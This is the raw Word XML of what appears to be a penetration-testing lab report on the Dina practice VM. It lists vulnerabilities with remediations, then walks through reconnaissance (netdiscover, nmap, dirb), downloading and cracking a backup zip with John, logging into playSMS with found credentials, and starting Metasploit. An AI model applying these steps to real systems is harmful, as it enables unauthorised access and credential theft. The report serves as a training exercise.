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350" w:tblpY="-1056"/>
        <w:tblW w:w="9918" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2038"/>
        <w:gridCol w:w="9246"/>
      </w:tblGrid>
      <w:tr w:rsidR="004F0E34" w14:paraId="1D394F3E" w14:textId="77777777" w:rsidTr="00801667">
        <w:trPr>
          <w:trHeight w:val="691"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C3EDA59" w14:textId="4809B90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be</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="024B48ED" w14:textId="5BC6725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ulnerability </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E34" w14:paraId="19961D91" w14:textId="77777777" w:rsidTr="00801667">
        <w:trPr>
          <w:trHeight w:val="712"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AA1B845" w14:textId="5B1AAB8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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69270921" w14:textId="7B26D043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</w:tr>
      <w:tr w:rsidR="004F0E34" w14:paraId="12AA7237" w14:textId="77777777" w:rsidTr="00801667">
        <w:trPr>
          <w:trHeight w:val="691"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EF910B4" w14:textId="1355E96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t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="240298BE" w14:textId="67D1AF22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4F0E34" w14:paraId="03128736" w14:textId="77777777" w:rsidTr="00801667">
        <w:trPr>
          <w:trHeight w:val="712"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FEC5C82" w14:textId="33C8AE61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8261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19A5A75E" w14:textId="41A75263" w:rsidR="004F0E34" w:rsidRDefault="00B16728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.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E34" w14:paraId="22744C04" w14:textId="77777777" w:rsidTr="00801667">
        <w:trPr>
          <w:trHeight w:val="691"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78D9CFB9" w14:textId="54594AAF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rity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5702D362" w14:textId="145438A9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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E34" w14:paraId="3F20C06D" w14:textId="77777777" w:rsidTr="00801667">
        <w:trPr>
          <w:trHeight w:val="691"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62950121" w14:textId="538B1606" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="0080166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vc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> I’d </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09593A5D" w14:textId="77777777" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E34" w14:paraId="2DCFE918" w14:textId="77777777" w:rsidTr="00801667">
        <w:trPr>
          <w:trHeight w:val="691"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1510CC20" w14:textId="7C0B38CE" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="0080166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vss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40739961" w14:textId="14AAC3C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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E34" w14:paraId="3685293A" w14:textId="77777777" w:rsidTr="00801667">
        <w:trPr>
          <w:trHeight w:val="691"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FB1EFED" w14:textId="3296F0D6" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="0080166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midiations</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="548F084C" w14:textId="77ECD6CA" w:rsidR="00B16728" w:rsidRPr="00B16728" w:rsidRDefault="00B16728" w:rsidP="00801667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C6DC4A9" w14:textId="4F85A16F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1. Exposure of Sensitive Information via robots.txt:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A1E72B0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7D22CE55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Vulnerability: The robots.txt file discloses multiple directories, some containing sensitive information such as potential passwords.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B529195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69A7E0F6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mediation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="686E236B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6451A8D8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strict Access to Sensitive Directories: Configure the web server to prevent unauthorized access to directories listed in robots.txt.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BC752AB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18BB28B0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Limit robots.txt Entries: Only include non-sensitive paths in robots.txt and avoid referencing directories that could expose critical information.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A2DB598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469C8A38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2. Storage of Plaintext Passwords in Web Directories:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6F65E0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12A432EC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Vulnerability: Passwords are stored in plaintext within web-accessible directories, making them easily retrievable.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4042349E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46E963AB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mediation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02A181E6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090101D1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move Plaintext Passwords: Ensure that sensitive information is not stored in web-accessible locations.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06AF5751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0FB5853A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Use Environment Variables: Store sensitive data, such as passwords, in environment variables or secure vaults, not within the web root.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D999363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27B7FCCE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3. Use of Default or Weak Credentials:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="586A3B62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7E75028D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Vulnerability: The application utilizes default or easily guessable credentials, facilitating unauthorized access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69EFE743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3387E1E9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mediation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EF2890C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398096A8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Enforce Strong Password Policies: Require users to create complex passwords that meet defined security criteria.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15208A45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1C652760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Disable Default Accounts: Remove or disable default accounts and ensure all active accounts have unique, strong credentials.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45F31453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195F8CB8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4. Unrestricted File Upload Leading to Remote Code Execution:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01A63D26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61848729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Vulnerability: The application allows users to upload files without proper validation, enabling the upload of malicious scripts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34421E1E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678A2B41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mediation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AAA4BF5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3230CCB2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Implement File Type Validation: Restrict uploads to only necessary file types and validate file headers to confirm their content.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1529A893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7A34D60E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name Uploaded Files: Assign unique names to uploaded files to prevent overwriting and avoid execution of malicious scripts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5804E24D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4E6A90B1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Store Files Outside Web Root: Save uploaded files in directories not accessible via the web to prevent direct execution.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421B23C3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2637B680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lastRenderedPageBreak/>
              <w:t>5. Insecure Use of Sudo Permissions:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="426121FE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2361F0C8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Vulnerability: Certain binaries, such as Perl, are allowed to run with elevated privileges without proper restrictions, enabling privilege escalation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F5EE485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7671C789" w14:textId="77777777" w:rsidR="00B16728" w:rsidRPr="00B16728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>Remediation:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0600D17A" w14:textId="77777777" w:rsidR="00B16728" w:rsidRPr="00B16728" w:rsidRDefault="00B16728" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="084E14EB" w14:textId="6870EECA" w:rsidR="004F0E34" w:rsidRDefault="00B16728" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B16728">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">Restrict Sudo Access: Limit </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B16728">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B16728">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> permissions to only those commands necessary for specific users, and avoid granting unrestricted access to interpreters like Perl.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E34" w14:paraId="729C9E65" w14:textId="77777777" w:rsidTr="00801667">
        <w:trPr>
          <w:trHeight w:val="691"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A0D451F" w14:textId="6F284E56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C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6538478E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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CC10A4D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3B1DECA6" w14:textId="42D76817" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="0080166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irst</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> we find IP and do </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>netdiscover</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> for Dina IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060C82E3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Netdiscover</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> -r 192.168.1.106)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6455B890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2905E521" w14:textId="74B524E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3BAE75" wp14:editId="06A0A3F6">
                  <wp:extent cx="5731510" cy="1155700"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
                  <wp:docPr id="1947104740" name="Picture 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04740" name="Picture 3" descr="A screenshot of a computer program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3F256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7DE4B4CA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we </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>do,Nmap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for checking open ports </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F8AAA2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nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>sT</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> 192.168.1.105)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63B6EF6D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BBEC598" wp14:editId="40AF3F05">
                  <wp:extent cx="5731510" cy="2084070"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="1734313930" name="Picture 4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13930" name="Picture 4" descr="A computer screen with white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12FC2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7A01CB50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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D69BCAE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31E1B1DA" w14:textId="479655E3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fter doing Nmap, now we do ‘</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>dirb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">’ </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A70CEBD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sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>dirb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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-  </w:t>
            </w:r>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidRPr="009171FA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="32"/>
                  <w:szCs w:val="32"/>
                </w:rPr>
                <w:t>http://192.168.1.105/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DA9DD04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14B7FAA2" w14:textId="0C78498A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E1184C0" wp14:editId="211E7CBD">
                  <wp:extent cx="5731510" cy="5245735"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="1345849727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849727" name="Picture 5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4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6E7C0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16C594DB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 we get “robot.txt”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see what inside in robot.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34EC62D0" w14:textId="77777777" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B978373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9A420F9" wp14:editId="1891C0C8">
                  <wp:extent cx="5468113" cy="1571844"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="770840596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40596" name="Picture 6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AD780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2E9AD454" w14:textId="7890D0E5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get lot of directories Now let’s check one-by-one all of them!!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04D0769B" w14:textId="77777777" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C62D4DA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A9D87B5" wp14:editId="786BF66E">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="745088714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088714" name="Picture 7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C800C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checking all of directory we get something in “nothing” directory </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD6A797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07E82360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3 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA1D358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 I do “curl” for looking source page</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E35BD06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61765C7A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5EA151F0" w14:textId="431A4282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0D9C555" wp14:editId="1D7432F6">
                  <wp:extent cx="5296639" cy="4448796"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="100609776" name="Picture 8" descr="A computer scree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9776" name="Picture 8" descr="A computer screen with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15E51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141C4C7A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get secret pass, now I save this now for future</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CAEB253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74FBD0FF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 I research in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>dirb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> but now I get something imp lets search that!!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="220338A7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7B8DC556" w14:textId="14C699B4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 </w:t>
            </w:r>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidRPr="009171FA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="32"/>
                  <w:szCs w:val="32"/>
                </w:rPr>
                <w:t>http://192.168.1.105/nothing/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70D149A0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8D87A71" w14:textId="70A1233A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DD3BC1F" wp14:editId="0EE49FF2">
                  <wp:extent cx="5731510" cy="3469005"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="1222341582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41582" name="Picture 9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AC5E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73DE00D0" w14:textId="28026C26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open I found “backup.zip” file </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26D21B82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65760C16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4 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CBA9B3B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 I download this file with the help of ‘</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15E58E60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1DE20E36" w14:textId="751085AF" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="0080166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spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>wget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hyperlink r:id="rId16" w:history="1">
              <w:r w:rsidRPr="009171FA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="32"/>
                  <w:szCs w:val="32"/>
                </w:rPr>
                <w:t>http://192.168.1.105/secure/backup.zip</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="193328BF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447F720" w14:textId="2293BFD6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3D8C09B" wp14:editId="5D61F544">
                  <wp:extent cx="5731510" cy="977900"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="1749399387" name="Picture 10" descr="A black background with a blue and white de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99387" name="Picture 10" descr="A black background with a blue and white design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55E15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57E0415E" w14:textId="5AAEDD1C" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="0080166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Lets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read this file with “cat command”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59AC9000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51389C92" w14:textId="28D6F61D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20B0E64" wp14:editId="4D33E041">
                  <wp:extent cx="5731510" cy="970280"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
                  <wp:docPr id="1991743666" name="Picture 11" descr="A computer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743666" name="Picture 11" descr="A computer screen shot of a computer cod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B7CB0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164B11C7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58F5CEB7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690830FF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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16E1F2FC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2A1AAA6A" w14:textId="77777777" w:rsidR="00F70F22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file is now encrypted form. So now I used the ‘zip2john’ tool to extract the password hash first. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B0103BB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508DE44C" w14:textId="5C0871C2" w:rsidR="00F70F22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n I used the john tool along with the passwords </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A4CA3C4" w14:textId="75336A9C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t we gathering from the webpage to crack the hash. This is how I did it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69337D14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A2EF3DB" wp14:editId="564DF505">
                  <wp:extent cx="5731510" cy="2500630"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="1066396222" name="Picture 12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96222" name="Picture 12" descr="A screen shot of a computer program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39945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44646C95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7752513D" w14:textId="242BEE5F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BDA034" wp14:editId="10B7A723">
                  <wp:extent cx="5731510" cy="445135"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="746449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495" name="Picture 746449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0939EB0" wp14:editId="6A3BAFE2">
                  <wp:extent cx="5731510" cy="1957705"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
                  <wp:docPr id="1396861211" name="Picture 14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61211" name="Picture 14" descr="A computer screen with whit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C71B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22F80C16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6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18EBCFE6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20F46117" w14:textId="29937363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fter crack this, now I use ‘7z x backup.zip’ and put password ‘freedom’ for looking sensitive information from that</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54119B8B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5A3D7291" w14:textId="5B512BFE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ED76B50" wp14:editId="793C995A">
                  <wp:extent cx="5731510" cy="3212465"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
                  <wp:docPr id="662650984" name="Picture 15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50984" name="Picture 15" descr="A computer screen shot of a computer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0FBE5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5DAC4426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is I </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>get  ‘</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">backup-cred.mp3’ file I using ‘cat’ command for looking inside in that  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F205EC0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34BF5C58" w14:textId="42890F65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4D401DD" wp14:editId="745851F9">
                  <wp:extent cx="5731510" cy="1155065"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
                  <wp:docPr id="1503348856" name="Picture 16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48856" name="Picture 16" descr="A black background with white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EDF26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2C467416" w14:textId="37DFA30C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 you see I get URL </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>“ /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>secretSMSgatwaylogin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> ”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25E03AD9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263E5BEB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7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EF2A213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41590BFB" w14:textId="33437BD6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</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>opening  URL</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> I get login page in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>playsm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14:paraId="301C49EE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102D6C36" w14:textId="7D408ADD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B4DC3BA" wp14:editId="715AA397">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="2011729593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29593" name="Picture 17" descr="A screenshot of a compu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D06CB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581A75E8" w14:textId="484CFCDD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know </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>touhid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="11ED9073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A2A2F29" w14:textId="69F9097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password I use that file I get from ‘robot.txt’ </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F5FDE43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using that file, I get password ‘Diana’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C88BAD2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6BDE63D0" w14:textId="61CB3A4E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D42BCC9" wp14:editId="44513845">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="2145143698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43698" name="Picture 18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6927C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4DA81A99" w14:textId="3473E720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 you see I login successfully </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4511391F" w14:textId="77777777" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="0080166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Lets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try to find more information in that </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DCA005A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40C9366C" w14:textId="28DE936A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8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4796D7E3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239B71D" w14:textId="497C7B66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open ‘</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">’ for getting access of root </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B3279E5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I use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> ‘search </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>playsms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D1181ED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5A7B4665" w14:textId="00E50585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AE89351" wp14:editId="2E85A6DA">
                  <wp:extent cx="5731510" cy="1050925"/>
